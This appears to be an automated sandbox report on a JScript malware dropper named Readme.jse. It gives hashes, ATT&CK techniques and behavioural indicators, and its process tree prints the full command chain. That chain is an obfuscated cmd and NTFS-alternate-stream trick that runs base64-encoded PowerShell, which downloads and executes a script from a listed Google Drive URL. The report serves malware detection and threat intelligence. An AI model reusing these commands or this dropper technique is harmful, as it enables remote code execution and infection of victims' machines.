d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61

General

Target

Readme.jse
Size

1KB
MD5

afbbf88c39646d17dcc0ce6383204b3b
SHA1

cd3a92e79faa4e1e9011ac21fa6beeb285657993
SHA256

d215bed00e78a30a169a76965364ba10205d24e1803a5d8cabdb22616679ef61
SHA512

e500ad5231b81b5ae5a92db03db8fe87c67299b7865b3f36293c98bb46614d17f3e11e712023d6fa06812c4717174f96db17ff36c2c8b2160ce71fe2b8909574

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?id=1iktVtJAbuAyKtOK0xSpQJnmm88EicL4d&export=download

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1732	powershell.exe
6	1732	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\LocalH6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1732	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1552 wrote to memory of 1216	1552	WScript.exe	28
PID 1552 wrote to memory of 1216	1552	WScript.exe	28
PID 1552 wrote to memory of 1216	1552	WScript.exe	28
PID 1216 wrote to memory of 2028	1216	cmd.exe	30
PID 1216 wrote to memory of 2028	1216	cmd.exe	30
PID 1216 wrote to memory of 2028	1216	cmd.exe	30
PID 1216 wrote to memory of 2040	1216	cmd.exe	31
PID 1216 wrote to memory of 2040	1216	cmd.exe	31
PID 1216 wrote to memory of 2040	1216	cmd.exe	31
PID 2040 wrote to memory of 1732	2040	cmd.exe	32
PID 2040 wrote to memory of 1732	2040	cmd.exe	32
PID 2040 wrote to memory of 1732	2040	cmd.exe	32
PID 1732 wrote to memory of 1364	1732	powershell.exe	33
PID 1732 wrote to memory of 1364	1732	powershell.exe	33
PID 1732 wrote to memory of 1364	1732	powershell.exe	33
PID 1364 wrote to memory of 524	1364	csc.exe	34
PID 1364 wrote to memory of 524	1364	csc.exe	34
PID 1364 wrote to memory of 524	1364	csc.exe	34
PID 1732 wrote to memory of 1180	1732	powershell.exe	35
PID 1732 wrote to memory of 1180	1732	powershell.exe	35
PID 1732 wrote to memory of 1180	1732	powershell.exe	35
PID 1732 wrote to memory of 536	1732	powershell.exe	36
PID 1732 wrote to memory of 536	1732	powershell.exe	36
PID 1732 wrote to memory of 536	1732	powershell.exe	36

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Readme.jse"
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" CMD.eXE /c cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA= > %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg & CMd - < %LOCALAPPDATA%H6JK704hfL3MYI4LLoo55sG4b8Il91u0F7JMuNXbzAXHXJWcdk3B5n1oUf85vnd7.mp3:u2B0hSqblRls2u1vOdK8KGBmOq8hrMlK51t17cw29K0DcAiq606t8KXsL8K2GI4N.ogg
  2⤵
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\system32\cmd.exe
    cMd.eXe /c eCHo poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
    3⤵
    PID:2028
- - C:\Windows\system32\cmd.exe
    CMd -
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      poWerSHelL.EXe -Ec aQBFAFgAKAAoAE4ARQBXAC0AbwBCAGoAZQBjAHQAIAAJAAkAIABuAEUAVAAuAFcAZQBCAEMAbABJAGUATgBUACkALgBEAG8AdwBuAGwATwBBAEQAUwBUAHIASQBOAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AaQBkAD0AMQBpAGsAdABWAHQASgBBAGIAdQBBAHkASwB0AE8ASwAwAHgAUwBwAFEASgBuAG0AbQA4ADgARQBpAGMATAA0AGQAJgBlAHgAcABvAHIAdAA9AGQAbwB3AG4AbABvAGEAZAAnACkAKQA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1732
    - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fkvf6lvm.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1364
      - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES253E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC253D.tmp"
        6⤵
        
        PID:524
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cOpy /b %LOCALAPPDATA%\23sBebmrIp3ktbW1Q4A5l50lSj56P0W0n2E375juzHRc6qMmq1MCRdJdaVJXSbDL.jpg + %LOCALAPPDATA%\DRy8q3cz8Qy7C9RCUj6Fgfl8cl50T0J1wXa763SSG9JOd7c3Hw6T56Tv4p3zg80m.avi %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:1180
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /k %LOCALAPPDATA%\w618hE5rEtFOJk0ONysyC281KctS7s6BsuFTCMMDb5QTW01S5SJv5BUSQLTfvFJL.mp3
        5⤵
        
        PID:536

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES253E.tmp

Filesize
1KB

MD5
bc62e7116fc3f857d233ef63a10f7584

SHA1
36a6d680bb8a87dda4bffe0c116b66733d73dc45

SHA256
b8d4fb6b95bdaa35744fd991cb40821c64749f4413816ead4c169765cb2c1ba6

SHA512
be7570aad0916272a5cb0a229c59f1d4cabe375dc8c3fefef9ae3f87c0e0944cad7ac48f3cce828a1654ea263f985fbd1b0fd65c4eaccef581937c4fc6c9d5c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\fkvf6lvm.dll

Filesize
3KB

MD5
b273fe57f9f5d90efcccf1db7fff45a7

SHA1
40ec8e2743456a287f652125d720e9fe478e3d46

SHA256
2dbdab94d9cb9c648147152172ec3964de5c237e3a15802d73a47fa71261c13a

SHA512
9f36aabe72bc7c066abe1110946487b949e5bec020c03a730df568a0103dd1fe77a188417ca90a58e6b0cf19d1feefe31e4d065d0d3820c1172ddb978d68b474

Download Submit
C:\Users\Admin\AppData\Local\Temp\fkvf6lvm.pdb

Filesize
7KB

MD5
613905ef6c125b5dce504b445cb9a9a5

SHA1
945f4ab46311aa4696a0e08a2565ca7bb6e0ac15

SHA256
02ccfd680f72dd85ac5c779722929edf4ebf55a11fc91f579964919c2b128097

SHA512
d447a0e729a89fa96bca69bd60e3581e5a2a8e6b39bc23e313ad779f475ff42efd6e74d44db9d8f75c811c2a098a141d06aa4524fc6754cdb6478975380375a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC253D.tmp

Filesize
652B

MD5
ad9ee095696c9a629f34ece13f4dca6a

SHA1
092fa747355cc421e89fffd24fb2cf5de66cabbe

SHA256
5bb59513bd3446154bbd8adb0adf60d35cac89e985a4c35d229c4eb2fae40988

SHA512
f7f79aa2883575721356d24d1a5e31b5988d783b566bcbd0f0e6b419c045437c6c1ae3f5fe120b64a33c286a94d6277af1aa85ca3dd7ff7e52a61833fd35f8a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fkvf6lvm.0.cs

Filesize
341B

MD5
1580ef4b9aa250d3a7839cb96f827b83

SHA1
5d1c458e697efb38e1ec19191ae753d83459df9a

SHA256
11f5a76d49f0609436736cbbd99fb416d507e78a3376a162bb8912f62ce3bab7

SHA512
8f63c8e1e68b66181f304015cc578ed4b058294f8c39c21d8638ebcd06b8946887d67af2dc96324fd1c2365d52ba65d417c82686c36ce0e0c0afcd688e840e2e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fkvf6lvm.cmdline

Filesize
309B

MD5
7a5a0aa8a88ec07db0aa012d51a47c99

SHA1
3e191a5d55eeecc95bc1654df7310a4b5e1715f8

SHA256
73f86d9caf51981478ff612b41c000f9520823b215dd8bf4aed65e920048818d

SHA512
28f3206e2e69d1ce14af136d457d132e79c608f00bd98d029d61101971e4b2f2e31f7fa9500f2d306416e1fa9d276998daf4c9e11d4aeb5315360cf5071604ac

Download Submit
memory/1552-54-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp

Filesize
8KB

Download
memory/1732-64-0x000000000292B000-0x000000000294A000-memory.dmp

Filesize
124KB

Download
memory/1732-63-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1732-62-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/1732-61-0x000007FEF3960000-0x000007FEF44BD000-memory.dmp

Filesize
11.4MB

Download
memory/1732-60-0x000007FEF44C0000-0x000007FEF4EE3000-memory.dmp

Filesize
10.1MB

Download
memory/1732-75-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/1732-76-0x000000000292B000-0x000000000294A000-memory.dmp

Filesize
124KB

Download

Resubmissions

Analysis

Sharing